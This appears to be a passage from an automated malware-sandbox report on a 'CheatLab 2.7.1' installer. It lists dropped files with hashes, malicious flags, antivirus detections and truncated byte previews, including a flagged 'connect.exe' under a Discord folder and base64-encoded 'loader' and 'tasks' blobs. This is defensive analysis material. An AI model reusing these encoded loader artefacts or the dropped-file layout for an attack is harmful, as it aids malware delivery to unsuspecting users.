                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI5ED6.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI92A9.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\MSI92D9.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijtgbpz3.cgy.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iofqwkd1.ukh.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3bls5zq.ene.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrdlsn40.cyf.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe

                                                    Download File
                                                    Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1070058901
                                                    Entropy (8bit):0.008758649776996388
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A8A24AF1D9E83BE788BD28D64967FE32
                                                    SHA1:BA48D37C5F714ECA8AF108A5508D8AD17FC14BE5
                                                    SHA-256:43ADFA84C5AC7F2A3BD99AD084580A503F17E5060A92D9F4FC6C58E5A59DA266
                                                    SHA-512:45D6DE4473000E09906AD7D359B3E9B3B84D5FFB4AC7E8BE69EA34170E3CD498BCAC96C49109C6EB23ABCFEF0D159B444D42638E5E6A972EB015CEADF2A4141F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............^..^..^..8^..^..)^.^...^D..^.w.^..^...^..^..^...^..)^..^..<^..^Rich..^........PE..L....=Ce.........................................@.................................................................................................L...H0..............................................................P............................text...=........................... ..`.reloc..W$.......&.................. ..`.rdata..pP.......R..................@..@.data...H....P...t... ..............@....qbjfz..........L...............................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\Pictures\9E146BE9C76A4720BCDB53011B87BD06.json

                                                    Download File
                                                    Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2072
                                                    Entropy (8bit):3.9566449661490495
                                                    Encrypted:false
                                                    SSDEEP:48:YttajcpXJ0gvxWr6cTnXRfhZa8lMHV9fEgS:styAXPsnBZcuWcgS
                                                    MD5:C4900FFF328F638455C25D11E43B106E
                                                    SHA1:6B86501D2B74ED99BE8BC9453348B4A78243557B
                                                    SHA-256:C6D61CDF586A6C6B51871D10F7D59F47C05C8D9EC1DBE40719EFD20F1B4E23DA
                                                    SHA-512:DB23877A8FD963D30568819B115978840C2A48E593872903035EDF179FBE749193BB5CD5528C07C6B6581E3F7D6475E9097DF9452BA8E4F46FC91CBAEBD0800E
                                                    Malicious:false
                                                    Preview:{"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTEsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsODUsOTUsODUsOTUsODgsNzIsNTgsNWIsZTMsYjcsYjAsYTUsYzMsZGYsNmUsOGMsOGIsYzgsY2MsZGMsYzcsYjUsNzAsOTQsN2MsZTEsYWMsZDksYWYsOTksYTYsNjMsOGIsODMsZDAsODcsY2MsYWIsYjAsYWQsOTIsN2QsNmYsNTMsOGYsZGEsNmMsYjcsZGQsYzYsYzksZDksODIsYTcsYTcsZDcsY2YsZGYsYmQsZGMsYTcsNTYsNWUsNjEsNzMsZDYsYzksYzYsY2MsYmIsYWIsNWIsYWEsNjMsYjUsOTIsYmEsZGYsYjEsY2YsOTcsNzQsN2MsY2YsY2IsOWMsYTksOTYsOTQsOGQsN2MsYTMsNjMsNTYsYTIsYTYsYzMsZDYsYmUsZDgsY2MsYWIsYTYsOWMsZDUsNjUsODksNTEsN2YsZTks","tasks":"OTMsYjQsOTIsYWMsYjMsNTMsODgsOGMsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2MsNmUsNmYsYTksNzcsODIsNjgsODAsOWMsODQsODYsOWIsODYsOT

                                                    C:\Windows\Installer\51799a.msi

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {B5CB4318-1D9E-4BE9-AA5C-9BD7E1851AD9}, Number of Words: 2, Subject: CheatLab 2.7.1, Author: CheatLab Corp., Name of Creating Application: CheatLab 2.7.1, Template: x64;2057, Comments: This installer database contains the logic and data required to install CheatLab 2.7.1., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                    Category:dropped
                                                    Size (bytes):2820608
                                                    Entropy (8bit):6.925890734266892
                                                    Encrypted:false
                                                    SSDEEP:49152:wIjRd5W8zBQSc0ZnSKxZKumZrDq4Fb6HXr1iWnYs4ntHurpllQ6aBuxtZ0eGisGg:n20ZnHKbFnWnwuxseGiZDal
                                                    MD5:C4ACCA57AD39174BA629781057F491E6
                                                    SHA1:2B2E7AE4386D7C7527636DE18A728719C298E38B
                                                    SHA-256:A62DB9A4B61D64F93C9352820DA477026AB7BA3F0CABE119C201AE0ECBAC82C7
                                                    SHA-512:211585F0F9513262A5402E4E7B131F2ABBF7C72204F1946E7C9F29BE0E1394453FCED3C3FBFCB56A4336B05CA92E30C12D051E68B5CCE00A04B44161A9FE5F53
                                                    Malicious:false
                                                    Preview:......................>...................,...................................Z.......W.......................................................T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...f...g...h.......v...................................................................................................................................................................................................................................................................................................................T...........#...0............................................................................................... ...!...".../...$.......&...'...(...)...*...+...,...-.......6...1...B...2...3...4...5...8...7...?...9...:...;...<...=...>.......@...A...S...C...D...E...F...G.......I...J...K...L...M...N...O...P...Q...R.......U.......V...W...X...Y...........\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                    C:\Windows\Installer\MSI7AF2.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Windows\Installer\MSI7B80.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Windows\Installer\MSI7BB0.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Windows\Installer\MSI7C0E.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):785929
                                                    Entropy (8bit):6.519777027140355
                                                    Encrypted:false
                                                    SSDEEP:12288:raHRuEs3Xmm9DZE/aHRuEs3Xmm9DZEzMvZx0FlS68zBQSncb4ZPQTpAjZxqO1N:r25snmmtZU25snmmtZkMvZCFlp8zBQSn
                                                    MD5:682BBA0046581296FD8C0B9FA345805A
                                                    SHA1:EF56F5DA088FAC855E2771F5CE8D9EA7C1946951
                                                    SHA-256:AFD2E55483286FD87877C7B359DC53B39A37F1C18FFA7CCA9E339B2A3EC0258C
                                                    SHA-512:CBBD2F24653C3913EE569695BD9BDA486073E93EF679B31271549DC4A1D6D32C135CC809A5DF86C1B4A3578599A041672905A77A60ADC60F2D92527C10978EA8
                                                    Malicious:false
                                                    Preview:...@IXOS.@.....@..dW.@.....@.....@.....@.....@.....@......&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}..CheatLab 2.7.1..Cheat.Lab.2.7.1.msi.@.....@.....@.....@........&.{B5CB4318-1D9E-4BE9-AA5C-9BD7E1851AD9}.....@.....@.....@.....@.......@.....@.....@.......@......CheatLab 2.7.1......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{7285EAEC-8503-4760-A351-B9914BE2072E}..C:\Program Files\CheatLab Corp\CheatLab 2.7.1\.@.......@.....@.....@......&.{782A455A-F17F-4F83-B43B-519E5CD02E50}2.22:\Software\CheatLab Corp.\CheatLab 2.7.1\Version.@.......@.....@.....@......&.{C63D9F59-1705-40C1-B07A-EB81FFC1E687}:.C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua.@.......@.....@.....@......&.{1C2DE547-5DF6-4AF7-9AB2-B1A94C1961C8}8.C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe.@.......@.....@.....@........AI_RollbackTasks21.Rolling back scheduled task on th

                                                    C:\Windows\Installer\MSI7C0F.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):191968
                                                    Entropy (8bit):6.4059654303545885
                                                    Encrypted:false
                                                    SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                    MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                    SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                    SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                    SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                    C:\Windows\Installer\MSI7CBC.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):191968
                                                    Entropy (8bit):6.4059654303545885
                                                    Encrypted:false
                                                    SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                    MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                    SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                    SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                    SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                    C:\Windows\Installer\MSI7D5A.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):399328
                                                    Entropy (8bit):6.589290025452677
                                                    Encrypted:false
                                                    SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                    MD5:B9545ED17695A32FACE8C3408A6A3553
                                                    SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                    SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                    SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

                                                    C:\Windows\Installer\MSI8673.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:modified
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Windows\Installer\SourceHash{2FA33EFE-BC43-4800-9FEF-38C5B173194D}

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.1666554232599644
                                                    Encrypted:false
                                                    SSDEEP:12:JSbX72FjxiAGiLIlHVRp+h/7777777777777777777777777vDHFmtaE1l0i8Q:JiQI5WUAXF
                                                    MD5:959352EC4ED3E35AAD9B991248B6DC29
                                                    SHA1:C126F89832ABBA95946C89F64D6AF9E9506297E2
                                                    SHA-256:C2C229A241B1BB095AB553CD4EC6CD5D99CE0327261E4F107E7331B37F99E24B
                                                    SHA-512:0F6F45712B2C058474843B41A032B4F9FB914BA6F2301FC9507CC227B4CE91FAA1EAF655AA8AABA79CFBA6C2198387E1CCE938E8070322FD06C04C0DC53821E9
                                                    Malicious:false
                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Windows\Installer\inprogressinstallinfo.ipi

                                                    Download File
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):1.5928482408230944
                                                    Encrypted:false
                                                    SSDEEP:48:j8PhhuRc06WXJIFT5vPdtRfSkdtR2VAEkrCyJ/2oxMOdtR2SkdtRaTeuz:Khh1rFTBXRfnR2eRCiZR2nRRi
                                                    MD5:A6EB9640D43F48E99BA489E9C3D2786F
                                                    SHA1:1A97EB177E52801FBBEDA5B3FB80ACAA64622767
                                                    SHA-256:3A8182A998A61B06B2C709E292E039C265C21AEBA20B8E31E5DC10FE18182F59
